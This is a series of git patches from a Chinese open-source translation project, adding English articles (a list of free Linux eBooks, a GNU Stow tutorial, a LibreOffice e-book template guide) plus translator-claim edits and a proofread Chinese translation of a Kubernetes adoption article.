+[Advanced Bash-Scripting Guide][20]
+
+### The AWK Programming Language [eBook]
+
+Not the prettiest book here but if you really need to go deeper with your scripts, this old-yet-gold book could be helpful.
+
+[The AWK Programming Language][21]
+
+### Linux 101 Hacks [eBook]
+
+This 270 pages eBook from The Geek Stuff teaches you the essentials of Linux command lines with easy to follow practical examples. You can get the book from the link below:
+
+[Linux 101 Hacks][22]
+
+## 4. Distribution specific free learning material
+
+This section deals with material that are dedicated to a certain Linux distribution. What we saw so far was the Linux in general, more focused on file systems, commands and other core stuff.
+
+These books, on the other hand, can be termed as manual or getting started guide for various Linux distributions. So if you are using a certain Linux distribution or planning to use it, you can refer to these resources. And yes, these books are more desktop Linux focused.
+
+I would also like to add that most Linux distributions have their own wiki or documentation section which are often pretty vast. You can always refer to them when you are online.
+
+### Ubuntu Manual
+
+Needless to say that this eBook is for Ubuntu users. It's an independent project that provides Ubuntu manual in the form of free eBook. It is updated for each version of Ubuntu.
+
+The book is rightly called manual because it is basically a composition of step by step instruction and aimed at absolute beginners to Ubuntu. So, you get to know Unity desktop, how to go around it and find applications etc.
+
+It's a must have if you never used Ubuntu Unity because it helps you to figure out how to use Ubuntu for your daily usage.
+
+[Ubuntu Manual][23]
+
+### For Linux Mint: Just Tell Me Damnit! [eBook]
+
+A very basic eBook that focuses on Linux Mint. It shows you how to install Linux Mint in a virtual machine, how to find software, install updates and customize the Linux Mint desktop.
+
+You can download the eBook from the link below:
+
+[Just Tell Me Damnit!][24]
+
+### Solus Linux Manual [eBook]
+
+Caution! This used to be the official manual from Solus Linux but I cannot find its mentioned on Solus Project's website anymore. I don't know if it's outdated or not. But in any case, a little something about Solu Linux won't really hurt, will it?
+
+[Solus Linux User Guide][25]
+
+## 5. Free eBooks for SysAdmin
+
+This section is dedicated to the SysAdmins, the superheroes for developers. I have listed a few free eBooks here for SysAdmin which will surely help anyone who is already a SysAdmin or aspirs to be one. I must add that you should also focus on essential Linux command lines as it will make your job easier.
+
+### The Debian Administration's Handbook [eBook]
+
+If you use Debian Linux for your servers, this is your bible. Book starts with Debian history, installation, package management etc and then moves on to cover topics like [LAMP][26], virtual machines, storage management and other core sysadmin stuff.
+
+[The Debian Administration's Handbook][27]
+
+### Advanced Linux System Administration [eBook]
+
+This is an ideal book if you are preparing for [LPI certification][28]. The book deals straightway to the topics essential for sysadmins. So knowledge of Linux command line is a prerequisite in this case.
+
+[Advanced Linux System Administration][29]
+
+### Linux System Administration [eBook]
+
+Another free eBook by Paul Cobbaut. The 370 pages long eBook covers networking, disk management, user management, kernel management, library management etc.
+
+[Linux System Administration][30]
+
+### Linux Servers [eBook]
+
+One more eBook from Paul Cobbaut of [linux-training.be][31]. This book covers web servers, mysql, DHCP, DNS, Samba and other file servers.
+
+[Linux Servers][32]
+
+### Linux Networking [eBook]
+
+Networking is the bread and butter of a SysAdmin, and this book by Paul Cobbaut (again) is a good reference material.
+
+[Linux Networking][33]
+
+### Linux Storage [eBook]
+
+This book by Paul Cobbaut (yes, him again) explains disk management on Linux in detail and introduces a lot of other storage-related technologies.
+
+[Linux Storage][34]
+
+### Linux Security [eBook]
+
+This is the last eBook by Paul Cobbaut in our list here. Security is one of the most important part of a sysadmin's job. This book focuses on file permissions, acls, SELinux, users and passwords etc.
+
+[Linux Security][35]
+
+## Your favorite Linux learning material?
+
+I know that this is a good collection of free Linux eBooks. But this could always be made better.
+
+If you have some other resources that could be helpful in learning Linux, do share with us. Please note to share only the legal downloads so that I can update this article with your suggestion(s) without any problem.
+
+I hope you find this article helpful in learning Linux. Your feedback is welcome :)
+
+--------------------------------------------------------------------------------
+
+via: https://itsfoss.com/learn-linux-for-free/
+
+作者:[Abhishek Prakash][a]
+译者:[译者ID](https://github.com/译者ID)
+校对:[校对者ID](https://github.com/校对者ID)
+
+本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
+
+[a]:https://itsfoss.com/author/abhishek/
+[1]:https://4bds6hergc-flywheel.netdna-ssl.com/wp-content/uploads/2017/02/free-ebooks-linux-800x450.png
+[2]:https://www.linuxfoundation.org/
+[3]:https://www.edx.org
+[4]:https://www.youtube.com/watch?v=eE-ovSOQK0Y
+[5]:https://www.edx.org/course/introduction-linux-linuxfoundationx-lfs101x-0
+[6]:https://linuxjourney.com/
+[7]:https://www.linuxtrainingacademy.com/
+[8]:https://courses.linuxtrainingacademy.com/itsfoss-ll5d/
+[9]:https://linuxnewbieguide.org/ulngebook/
+[10]:http://www.tldp.org/index.html
+[11]:http://tldp.org/LDP/intro-linux/intro-linux.pdf
+[12]:http://linux-training.be/linuxfun.pdf
+[13]:http://advancedlinuxprogramming.com/alp-folder/advanced-linux-programming.pdf
+[14]:http://www.linuxfromscratch.org/
+[15]:http://tldp.org/LDP/GNU-Linux-Tools-Summary/GNU-Linux-Tools-Summary.pdf
+[16]:https://www.gnu.org/home.en.html
+[17]:https://www.gnu.org/software/bash/manual/bash.pdf
+[18]:http://linuxcommand.org/tlcl.php
+[19]:http://www.tldp.org/LDP/Bash-Beginners-Guide/Bash-Beginners-Guide.pdf
+[20]:http://www.tldp.org/LDP/abs/abs-guide.pdf
+[21]:https://ia802309.us.archive.org/25/items/pdfy-MgN0H1joIoDVoIC7/The_AWK_Programming_Language.pdf
+[22]:http://www.thegeekstuff.com/linux-101-hacks-ebook/
+[23]:https://ubuntu-manual.org/
+[24]:http://downtoearthlinux.com/resources/just-tell-me-damnit/
+[25]:https://drive.google.com/file/d/0B5Ymf8oYXx-PWTVJR0pmM3daZUE/view
+[26]:https://en.wikipedia.org/wiki/LAMP_(software_bundle)
+[27]:https://debian-handbook.info/about-the-book/
+[28]:https://www.lpi.org/our-certifications/getting-started
+[29]:http://www.nongnu.org/lpi-manuals/manual/pdf/GNU-FDL-OO-LPI-201-0.1.pdf
+[30]:http://linux-training.be/linuxsys.pdf
+[31]:http://linux-training.be/
+[32]:http://linux-training.be/linuxsrv.pdf
+[33]:http://linux-training.be/linuxnet.pdf
+[34]:http://linux-training.be/linuxsto.pdf
+[35]:http://linux-training.be/linuxsec.pdf
From 1fa01213657c8c40ecfd8605eab7938c46770056 Mon Sep 17 00:00:00 2001
From: darksun
Date: Sat, 6 Jan 2018 13:47:55 +0800
Subject: [PATCH 088/371] =?UTF-8?q?=E9=80=89=E9=A2=98:=20How=20to=20use=20?=
=?UTF-8?q?GNU=20Stow=20to=20manage=20programs=20installed=20from=20source?=
=?UTF-8?q?=20and=20dotfiles?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
---
...rams installed from source and dotfiles.md | 142 ++++++++++++++++++
1 file changed, 142 insertions(+)
create mode 100644 sources/tech/20171007 How to use GNU Stow to manage programs installed from source and dotfiles.md
diff --git a/sources/tech/20171007 How to use GNU Stow to manage programs installed from source and dotfiles.md b/sources/tech/20171007 How to use GNU Stow to manage programs installed from source and dotfiles.md
new file mode 100644
index 0000000000..9db9a90f39
--- /dev/null
+++ b/sources/tech/20171007 How to use GNU Stow to manage programs installed from source and dotfiles.md
@@ -0,0 +1,142 @@
+How to use GNU Stow to manage programs installed from source and dotfiles
+======
+
+### Objective
+
+Easily manage programs installed from source and dotfiles using GNU stow
+
+### Requirements
+
+ * Root permissions
+
+
+
+### Difficulty
+
+EASY
+
+### Conventions
+
+ * **#** \- requires given command to be executed with root privileges either directly as a root user or by use of `sudo` command
+ * **$** \- given command to be executed as a regular non-privileged user
+
+
+
+### Introduction
+
+Sometimes we have to install programs from source: maybe they are not available through standard channels, or maybe we want a specific version of a software. GNU stow is a very nice `symlinks factory` program which helps us a lot by keeping files organized in a very clean and easy to maintain way.
+
+### Obtaining stow
+
+Your distribution repositories is very likely to contain `stow`, for example in Fedora, all you have to do to install it is:
+```
+# dnf install stow
+```
+
+or on Ubuntu/Debian you can install stow by executing:
+```
+
+# apt install stow
+
+```
+
+In some distributions, stow it's not available in standard repositories, but it can be easily obtained by adding some extra software sources (for example epel in the case of Rhel and CentOS7) or, as a last resort, by compiling it from source: it requires very little dependencies.
+
+### Compiling stow from source
+
+The latest available stow version is the `2.2.2`: the tarball is available for download here: `https://ftp.gnu.org/gnu/stow/`.
+
+Once you have downloaded the sources, you must extract the tarball. Navigate to the directory where you downloaded the package and simply run:
+```
+$ tar -xvpzf stow-2.2.2.tar.gz
+```
+
+After the sources have been extracted, navigate inside the stow-2.2.2 directory, and to compile the program simply run:
+```
+
+$ ./configure
+$ make
+
+```
+
+Finally, to install the package:
+```
+# make install
+```
+
+By default the package will be installed in the `/usr/local/` directory, but we can change this, specifying the directory via the `--prefix` option of the configure script, or by adding `prefix="/your/dir"` when running the `make install` command.
+
+At this point, if all worked as expected we should have `stow` installed on our system
+
+### How does stow work?
+
+The main concept behind stow it's very well explained in the program manual:
+```
+
+The approach used by Stow is to install each package into its own tree,
+then use symbolic links to make it appear as though the files are
+installed in the common tree.
+
+```
+
+To better understand the working of the package, let's analyze its key concepts:
+
+#### The stow directory
+
+The stow directory is the root directory which contains all the `stow packages`, each with their own private subtree. The typical stow directory is `/usr/local/stow`: inside it, each subdirectory represents a `package`
+
+#### Stow packages
+
+As said above, the stow directory contains "packages", each in its own separate subdirectory, usually named after the program itself. A package is nothing more than a list of files and directories related to a specific software, managed as an entity.
+
+#### The stow target directory
+
+The stow target directory is very a simple concept to explain. It is the directory in which the package files must appear to be installed. By default the stow target directory is considered to be the one above the directory in which stow is invoked from. This behaviour can be easily changed by using the `-t` option (short for --target), which allows us to specify an alternative directory.
+
+### A practical example
+
+I believe a well done example is worth 1000 words, so let's show how stow works. Suppose we want to compile and install `libx264`. Lets clone the git repository containing its sources:
+```
+$ git clone git://git.videolan.org/x264.git
+```
+
+Few seconds after running the command, the "x264" directory will be created, and it will contain the sources, ready to be compiled. We now navigate inside it and run the `configure` script, specifying the /usr/local/stow/libx264 directory as `--prefix`:
+```
+$ cd x264 && ./configure --prefix=/usr/local/stow/libx264
+```
+
+Then we build the program and install it:
+```
+
+$ make
+# make install
+
+```
+
+The directory x264 should have been created inside of the stow directory: it contains all the stuff that would have been normally installed in the system directly. Now, all we have to do, is to invoke stow. We must run the command either from inside the stow directory, by using the `-d` option to specify manually the path to the stow directory (default is the current directory), or by specifying the target with `-t` as said before. We should also provide the name of the package to be stowed as an argument. In this case we run the program from the stow directory, so all we need to type is:
+```
+# stow libx264
+```
+
+All the files and directories contained in the libx264 package have now been symlinked in the parent directory (/usr/local) of the one from which stow has been invoked, so that, for example, libx264 binaries contained in `/usr/local/stow/x264/bin` are now symlinked in `/usr/local/bin`, files contained in `/usr/local/stow/x264/etc` are now symlinked in `/usr/local/etc` and so on. This way it will appear to the system that the files were installed normally, and we can easily keep track of each program we compile and install. To revert the action, we just use the `-D` option:
+```
+# stow -d libx264
+```
+
+It is done! The symlinks don't exist anymore: we just "uninstalled" a stow package, keeping our system in a clean and consistent state. At this point it should be clear why stow it's also used to manage dotfiles. A common practice is to have all user-specific configuration files inside a git repository, to manage them easily and have them available everywhere, and then using stow to place them where appropriate, in the user home directory.
+
+Stow will also prevent you from overriding files by mistake: it will refuse to create symbolic links if the destination file already exists and doesn't point to a package into the stow directory. This situation is called a conflict in stow terminology.
+
+That's it! For a complete list of options, please consult the stow manpage and don't forget to tell us your opinions about it in the comments.
+
+--------------------------------------------------------------------------------
+
+via: https://linuxconfig.org/how-to-use-gnu-stow-to-manage-programs-installed-from-source-and-dotfiles
+
+作者:[Egidio Docile][a]
+译者:[译者ID](https://github.com/译者ID)
+校对:[校对者ID](https://github.com/校对者ID)
+
+本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
+
+[a]:https://linuxconfig.org
From 2c76e51a2e4c853d53c25360bfd9d3b7c3638806 Mon Sep 17 00:00:00 2001
From: zjon
Date: Sat, 6 Jan 2018 13:49:08 +0800
Subject: [PATCH 089/371] zjon translating
---
sources/tech/20171011 What is a firewall.md | 3 +++
1 file changed, 3 insertions(+)
diff --git a/sources/tech/20171011 What is a firewall.md b/sources/tech/20171011 What is a firewall.md
index fe1142b8a4..ebc921cc3e 100644
--- a/sources/tech/20171011 What is a firewall.md
+++ b/sources/tech/20171011 What is a firewall.md
@@ -1,3 +1,4 @@
+Tranlating by zjon
What is a firewall?
======
Network-based firewalls have become almost ubiquitous across US enterprises for their proven defense against an ever-increasing array of threats.
@@ -77,3 +78,5 @@ via: https://www.networkworld.com/article/3230457/lan-wan/what-is-a-firewall-per
[a]:https://www.networkworld.com/author/Brandon-Butler/
[1]:https://www.networkworld.com/article/3236448/lan-wan/what-to-consider-when-deploying-a-next-generation-firewall.html
+
+
From 8bfbf6afd657ae8b2c624116956b8c8e56436af6 Mon Sep 17 00:00:00 2001
From: jon
Date: Fri, 5 Jan 2018 23:53:38 -0600
Subject: [PATCH 090/371] zjon translating
---
sources/tech/20171011 What is a firewall.md | 2 +-
1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/sources/tech/20171011 What is a firewall.md b/sources/tech/20171011 What is a firewall.md
index ebc921cc3e..4e82483b58 100644
--- a/sources/tech/20171011 What is a firewall.md
+++ b/sources/tech/20171011 What is a firewall.md
@@ -1,4 +1,4 @@
-Tranlating by zjon
+Translating by zjontranslating
What is a firewall?
======
Network-based firewalls have become almost ubiquitous across US enterprises for their proven defense against an ever-increasing array of threats.
From 74a70225559621a5fc1acb6767b0bd491c6b3fc5 Mon Sep 17 00:00:00 2001
From: jon
Date: Fri, 5 Jan 2018 23:54:36 -0600
Subject: [PATCH 091/371] Update 20171011 What is a firewall.md
---
sources/tech/20171011 What is a firewall.md | 2 +-
1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/sources/tech/20171011 What is a firewall.md b/sources/tech/20171011 What is a firewall.md
index 4e82483b58..3b7b90c4fe 100644
--- a/sources/tech/20171011 What is a firewall.md
+++ b/sources/tech/20171011 What is a firewall.md
@@ -1,4 +1,4 @@
-Translating by zjontranslating
+Translating by zjon
What is a firewall?
======
Network-based firewalls have become almost ubiquitous across US enterprises for their proven defense against an ever-increasing array of threats.
From 30559da4e8cdcbd0c9b43a0d5d16c18a940555a6 Mon Sep 17 00:00:00 2001
From: jon
Date: Fri, 5 Jan 2018 23:55:02 -0600
Subject: [PATCH 092/371] Update 20171011 What is a firewall.md
---
sources/tech/20171011 What is a firewall.md | 1 +
1 file changed, 1 insertion(+)
diff --git a/sources/tech/20171011 What is a firewall.md b/sources/tech/20171011 What is a firewall.md
index 3b7b90c4fe..3401995721 100644
--- a/sources/tech/20171011 What is a firewall.md
+++ b/sources/tech/20171011 What is a firewall.md
@@ -1,4 +1,5 @@
Translating by zjon
+
What is a firewall?
======
Network-based firewalls have become almost ubiquitous across US enterprises for their proven defense against an ever-increasing array of threats.
From 08f6d9866425fb60ea43f28607946c2677be9d8c Mon Sep 17 00:00:00 2001
From: darksun
Date: Sat, 6 Jan 2018 13:55:16 +0800
Subject: [PATCH 093/371] =?UTF-8?q?=E9=80=89=E9=A2=98:=20How=20to=20create?=
=?UTF-8?q?=20an=20e-book=20chapter=20template=20in=20LibreOffice=20Writer?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
---
... chapter template in LibreOffice Writer.md | 123 ++++++++++++++++++
1 file changed, 123 insertions(+)
create mode 100644 sources/tech/20171018 How to create an e-book chapter template in LibreOffice Writer.md
diff --git a/sources/tech/20171018 How to create an e-book chapter template in LibreOffice Writer.md b/sources/tech/20171018 How to create an e-book chapter template in LibreOffice Writer.md
new file mode 100644
index 0000000000..7b0a5bd1c5
--- /dev/null
+++ b/sources/tech/20171018 How to create an e-book chapter template in LibreOffice Writer.md
@@ -0,0 +1,123 @@
+How to create an e-book chapter template in LibreOffice Writer
+======
+![](https://opensource.com/sites/default/files/styles/image-full-size/public/lead-images/EDUCATION_colorbooks.png?itok=vNhsYYyC)
+For many people, using a word processor is the fastest, easiest, and most familiar way to write and publish an e-book. But firing up your word processor and typing away isn't enough--you need to follow a format.
+
+That's where a template comes in. A template ensures that your book has a consistent look and feel. Luckily, creating a template is quick and easy, and the time and effort you spend on it will give you a better-looking book.
+
+In this article, I'll walk you through how to create a simple template for writing individual chapters of an e-book using LibreOffice Writer. You can use this template for both PDF and EPUB books and modify it to suit your needs.
+
+### My approach
+
+Why am I focusing on creating a template for a chapter rather than one for an entire book? Because it's easier to write and manage individual chapters than it is to work on a single monolithic document.
+
+By focusing on individual chapters, you can focus on what you need to write. You can easily move those chapters around, and it's less cumbersome to send a reviewer a single chapter rather than your full manuscript. When you've finished writing a chapter, you can simply stitch your chapters together to publish the book (I'll discuss how to do that below). But don't feel that you're stuck with this approach--if you prefer to write in single file, simply adapt the steps described in this article to doing so.
+
+Let's get started.
+
+### Setting up the page
+
+This is important only if you plan to publish your e-book as a PDF. Setting up the page means your book won't comprise a mass of eye-straining text running across the screen.
+
+Select **Format > Page** to open the **Page Style** window. My PDF e-books are usually 5x8 inches tall (about 13x20cm, for those of us in the metric world). I also set the margins to half an inch (around 1.25 cm). These are my preferred dimensions; use whatever size suits you.
+
+![LibreOffice Page Style window][2]
+
+
+The Page Style window in LibreOffice Writer lets you set margins and format the page.
+
+Next, add a footer to display a page number. Keep the Page Style window open and click the **Footer** tab. Select **Footer on** and click **OK**.
+
+On the page, click in the footer, then select **Insert > Field > Page Number**. Don't worry about the position and appearance of the page number; we'll take care of that next.
+
+### Setting up your styles
+
+Like the template itself, styles provide a consistent look and feel for your documents. If you want to change the font or the size of a heading, for example, you need do it in only one place rather than manually applying formatting to each heading.
+
+The standard LibreOffice template comes with a number of styles that you can fiddle with to suit your needs. To do that, press **F11** to open the **Styles and Formatting** window.
+
+### [lo-paragraph-style.png][3]
+
+![LibreOffice styles and formatting][4]
+
+
+Change fonts and other details using the Styles and Formatting window.
+
+Right-click on a style and select **Modify** to edit it. Here are the main styles that I use in every book I write:
+
+Style Font Spacing/Alignment Heading 1 Liberation Sans, 36 pt 36 pt above, 48 pt below, aligned left Heading 2 Liberation Sans, 18 pt 12 pt above, 12 pt below, aligned left Heading 3 Liberation Sans, 14 pt 12 pt above, 12 pt below, aligned left Text Body Liberation Sans, 12 pt 12 pt above, 12 pt below, aligned left Footer Liberation Sans, 10 pt Aligned center
+
+### [lo-styles-in-action.png][5]
+
+![LibreOffice styles in action][6]
+
+
+Here's what a selected style looks like when applied to ebook content.
+
+That's usually the bare minimum you need for most books. Feel free to change the fonts and spacing to suit your needs.
+
+Depending on the type of book you're writing, you might also want to create or modify styles for bullet and number lists, quotes, code samples, figures, etc. Just remember to use fonts and their sizes consistently.
+
+### Saving your template
+
+Select **File > Save As**. In the Save dialog box, select _ODF Text Document Template (.ott)_ from the formats list. This saves the document as a template, which you'll be able to quickly call up later.
+
+The best place to save it is in your LibreOffice templates folder. In Linux, for example, that's in your **/home** directory, under . **config/libreoffice/4/user/template**.
+
+### Writing your book
+
+Before you start writing, create a folder on your computer that will hold all the files--chapters, images, notes, etc.--for your book.
+
+When you're ready to write, fire up LibreOffice Writer and select **File > New > Templates**. Then select your template from the list and click **Open**.
+
+### [lo-template-list.png][7]
+
+![LibreOffice Writer template list][8]
+
+
+Select your template from the list you set up in LibreOffice Writer and begin writing.
+
+Then save the document with a descriptive name.
+
+Avoid using conventions like _Chapter 1_ and _Chapter 2_ --at some point, you might decide to shuffle your chapters around, and it can get confusing when you're trying to manage those chapters. You could, however, put chapter numbers, like _Chapter 1_ or _Ch1,_ in the file name. It's easier to rename a file like that if you do wind up rearranging the chapters of your book.
+
+With that out of the way, start writing. Remember to use the styles in the template to format the text--that's why you created the template, right?
+
+### Publishing your e-book
+
+Once you've finished writing a bunch of chapters and are ready to publish them, create a master document. Think of a master document as a container for the chapters you've written. Using a master document, you can quickly assemble your book and rearrange your chapters at will. The LibreOffice help offers detailed instructions for working with [master documents][9].
+
+Assuming you want to generate a PDF, don't just click the **Export Directly to PDF** button. That will create a decent PDF, but you might want to optimize it. To do that, select **File > Export as PDF** and tweak the settings in the PDF options window. You can learn more about that in the [LibreOffice Writer documentation][10].
+
+If you want to create an EPUB instead of, or in addition to, a PDF, install the [Writer2EPUB][11] extension. Opensource.com's Bryan Behrenshausen [shares some useful instructions][12] for the extension.
+
+### Final thoughts
+
+The template we've created here is bare-bones, but you can use it for a simple book, or as the starting point for building a more complex template. Either way, this template will quickly get you started writing and publishing your e-book.
+
+### About The Author
+Scott Nesbitt;I'M A Long-Time User Of Free Open Source Software;Write Various Things For Both Fun;Profit. I Don'T Take Myself Too Seriously;I Do All Of My Own Stunts. You Can Find Me At These Fine Establishments On The Web
+
+--------------------------------------------------------------------------------
+
+via: https://opensource.com/article/17/10/creating-ebook-chapter-template-libreoffice-writer
+
+作者:[Scott Nesbitt][a]
+译者:[译者ID](https://github.com/译者ID)
+校对:[校对者ID](https://github.com/校对者ID)
+
+本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
+
+[a]:https://opensource.com/users/scottnesbitt
+[1]:/file/374456
+[2]:https://opensource.com/sites/default/files/images/life-uploads/lo-page-style.png (LibreOffice Page Style window)
+[3]:/file/374461
+[4]:https://opensource.com/sites/default/files/images/life-uploads/lo-paragraph-style.png (LibreOffice styles and formatting window)
+[5]:/file/374466
+[6]:https://opensource.com/sites/default/files/images/life-uploads/lo-styles-in-action.png (Example of LibreOffice styles)
+[7]:/file/374471
+[8]:https://opensource.com/sites/default/files/images/life-uploads/lo-template-list.png (Template list - LibreOffice Writer)
+[9]:https://help.libreoffice.org/Writer/Working_with_Master_Documents_and_Subdocuments
+[10]:https://help.libreoffice.org/Common/Export_as_PDF
+[11]:http://writer2epub.it/en/
+[12]:https://opensource.com/life/13/8/how-create-ebook-open-source-way
From 8c40343c4307bc570eb2a4c75d3383499f9a5665 Mon Sep 17 00:00:00 2001
From: wxy
Date: Sat, 6 Jan 2018 14:35:24 +0800
Subject: [PATCH 094/371] =?UTF-8?q?PRF:20171120=20Adopting=20Kubernetes=20?=
=?UTF-8?q?step=20by=C2=A0step.md?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
@aiwhj
---
...171120 Adopting Kubernetes step by step.md | 67 +++++++++----------
1 file changed, 32 insertions(+), 35 deletions(-)
diff --git a/translated/tech/20171120 Adopting Kubernetes step by step.md b/translated/tech/20171120 Adopting Kubernetes step by step.md
index 3e9015d155..8471ca85fe 100644
--- a/translated/tech/20171120 Adopting Kubernetes step by step.md
+++ b/translated/tech/20171120 Adopting Kubernetes step by step.md
@@ -1,80 +1,77 @@
一步步采用 Kubernetes
============================================================
-为什么选择 Docker 和 Kubernetes 呢?
+### 为什么选择 Docker 和 Kubernetes 呢?
-容器允许我们构建,发布和运行分布式应用。他们使应用程序摆脱了机器限制,让我们以一定的方式创建一个复杂的应用程序。
+容器允许我们构建、发布和运行分布式应用。它们使应用程序摆脱了机器限制,可以让我们以一定的方式创建一个复杂的应用程序。
-使用容器编写应用程序可以使开发,QA 更加接近生产环境(如果你努力这样做的话)。通过这样做,可以更快地发布修改,并且可以更快地测试整个系统。
+使用容器编写应用程序可以使开发、QA 更加接近生产环境(如果你努力这样做的话)。通过这样做,可以更快地发布修改,并且可以更快地测试整个系统。
-[Docker][1] 可以使软件独立于云提供商的容器化平台。
+[Docker][1] 这个容器式平台就是为此为生,可以使软件独立于云提供商。
-但是,即使使用容器,移植应用程序到任何一个云提供商(或私有云)所需的工作量也是非常重要的。应用程序通常需要自动伸缩组,持久远程光盘,自动发现等。但是每个云提供商都有不同的机制。如果你想使用这些功能,很快你就会变的依赖于云提供商。
+但是,即使使用容器,移植应用程序到任何一个云提供商(或私有云)所需的工作量也是不可忽视的。应用程序通常需要自动伸缩组、持久远程磁盘、自动发现等。但是每个云提供商都有不同的机制。如果你想使用这些功能,很快你就会变的依赖于云提供商。
-这正是 [Kubernetes][2] 登场的时候。它是一个容器编排系统,它允许您以一定的标准管理,缩放和部署应用程序的不同部分,并且成为其中的重要工具。它抽象出来以兼容主要云的提供商(Google Cloud,Amazon Web Services 和 Microsoft Azure 都支持 Kubernetes)。
+这正是 [Kubernetes][2] 登场的时候。它是一个容器编排系统,它允许您以一定的标准管理、缩放和部署应用程序的不同部分,并且成为其中的重要工具。它的可移植抽象层兼容主要云的提供商(Google Cloud,Amazon Web Services 和 Microsoft Azure 都支持 Kubernetes)。
-通过一个方法来想象一下应用程序,容器和 Kubernetes 。应用程序可以视为一条身边的鲨鱼,它存在于海洋中(在这个例子中,海洋就是您的机器)。海洋中可能还有其他一些宝贵的东西,但是你不希望你的鲨鱼与小丑鱼有什么关系。所以需要把你的鲨鱼(你的应用程序)移动到一个密封的水族馆中(容器)。这很不错,但不是特别的健壮。你的水族馆可能会打破,或者你想建立一个通道连接到其他鱼类生活的另一个水族馆。也许你想要许多这样的水族馆,以防需要清洁或维护... 这正是应用 Kubernetes 集群的地方。
+可以这样想象一下应用程序、容器和 Kubernetes。应用程序可以视为一条身边的鲨鱼,它存在于海洋中(在这个例子中,海洋就是您的机器)。海洋中可能还有其他一些宝贵的东西,但是你不希望你的鲨鱼与小丑鱼有什么关系。所以需要把你的鲨鱼(你的应用程序)移动到一个密封的水族馆中(容器)。这很不错,但不是特别的健壮。你的水族馆可能会被打破,或者你想建立一个通道连接到其他鱼类生活的另一个水族馆。也许你想要许多这样的水族馆,以防需要清洁或维护……这正是应用 Kubernetes 集群的作用。
![](https://cdn-images-1.medium.com/max/1600/1*OVt8cnY1WWOqdLFycCgdFg.jpeg)
-Evolution to Kubernetes
-Kubernetes 由云提供商提供支持,从开发到生产,它使您和您的团队能够更容易地拥有几乎相同的环境。这是因为 Kubernetes 不依赖专有软件,服务或另外一些基础设施。
+*进化到 Kubernetes*
+
+主流云提供商对 Kubernetes 提供了支持,从开发环境到生产环境,它使您和您的团队能够更容易地拥有几乎相同的环境。这是因为 Kubernetes 不依赖专有软件、服务或基础设施。
事实上,您可以在您的机器中使用与生产环境相同的部件启动应用程序,从而缩小了开发和生产环境之间的差距。这使得开发人员更了解应用程序是如何构建在一起的,尽管他们可能只负责应用程序的一部分。这也使得在开发流程中的应用程序更容易的快速完成测试。
-如何使用 Kubernetes 工作?
+### 如何使用 Kubernetes 工作?
-随着更多的人采用 Kubernetes,新的问题出现了;应该如何针对基于集群环境开发?假设有 3 个环境,开发,质量保证和生产, 如何适应 Kubernetes?这些环境之间仍然存在着差异,无论是在开发周期(例如:在正在运行的应用程序中看到修改代码所花费的时间)还是与数据相关的(例如:我不应该在我的质量保证环境中测试生产数据,因为它里面有敏感信息)
+随着更多的人采用 Kubernetes,新的问题出现了;应该如何针对基于集群环境进行开发?假设有 3 个环境,开发、质量保证和生产, 他们如何适应 Kubernetes?这些环境之间仍然存在着差异,无论是在开发周期(例如:在运行中的应用程序中我的代码的变化上花费时间)还是与数据相关的(例如:我不应该在我的质量保证环境中测试生产数据,因为它里面有敏感信息)。
-那么,我是否应该总是在 Kubernetes 集群中编码,构建映像,重新部署服务?或者,我是否不应该尽力让我的开发环境也成为一个 Kubernetes 集群的其中之一(或一组集群)呢?还是,我应该以混合方式工作?
+那么,我是否应该总是在 Kubernetes 集群中编码、构建映像、重新部署服务,在我编写代码时重新创建部署和服务?或者,我是否不应该尽力让我的开发环境也成为一个 Kubernetes 集群(或一组集群)呢?还是,我应该以混合方式工作?
![](https://cdn-images-1.medium.com/max/1600/1*MXokxD8Ktte4_vWvTas9uw.jpeg)
-Development with a local cluster
-如果继续我们之前的比喻,使其保持在一个开发集群中的同时侧面的通道代表着修改应用程序的一种方式。这通常通过[volumes][4]来实现
+*用本地集群进行开发*
-一个 Kubernetes 系列
+如果继续我们之前的比喻,上图两边的洞表示当使其保持在一个开发集群中的同时修改应用程序的一种方式。这通常通过[卷][4]来实现
-Kubernetes 系列资源是开源的,可以在这里找到:
+### Kubernetes 系列
-### [https://github.com/red-gate/ks][5]
+本 Kubernetes 系列资源是开源的,可以在这里找到: [https://github.com/red-gate/ks][5] 。
-我们写这个系列作为练习以不同的方式构建软件。我们试图约束自己在所有环境中都使用 Kubernetes,以便我们可以探索这些技术对数据和数据库的开发和管理造成影响。
+我们写这个系列作为以不同的方式构建软件的练习。我们试图约束自己在所有环境中都使用 Kubernetes,以便我们可以探索这些技术对数据和数据库的开发和管理造成影响。
-这个系列从使用 Kubernetes 创建基本的React应用程序开始,并逐渐演变为能够覆盖我们更多开发需求的系列。最后,我们将覆盖所有应用程序的开发需求,并且理解在数据库生命周期中如何最好地迎合容器和集群。
+这个系列从使用 Kubernetes 创建基本的 React 应用程序开始,并逐渐演变为能够覆盖我们更多开发需求的系列。最后,我们将覆盖所有应用程序的开发需求,并且理解在数据库生命周期中如何最好地迎合容器和集群。
以下是这个系列的前 5 部分:
-1. ks1: 使用 Kubernetes 构建一个React应用程序
+1. ks1:使用 Kubernetes 构建一个 React 应用程序
+2. ks2:使用 minikube 检测 React 代码的更改
+3. ks3:添加一个提供 API 的 Python Web 服务器
+4. ks4:使 minikube 检测 Python 代码的更改
+5. ks5:创建一个测试环境
-2. ks2: 使用 minikube 检测 React 代码的更改
+本系列的第二部分将添加一个数据库,并尝试找出最好的方式来开发我们的应用程序。
-3. ks3: 添加一个提供 API 的 Python Web 服务器
+通过在各种环境中运行 Kubernetes,我们被迫在解决新问题的同时也尽量保持开发周期。我们不断尝试 Kubernetes,并越来越习惯它。通过这样做,开发团队都可以对生产环境负责,这并不困难,因为所有环境(从开发到生产)都以相同的方式进行管理。
-4. ks4: 使 minikube 检测 Python 代码的更改
-
-5. ks5: 创建一个测试环境
-
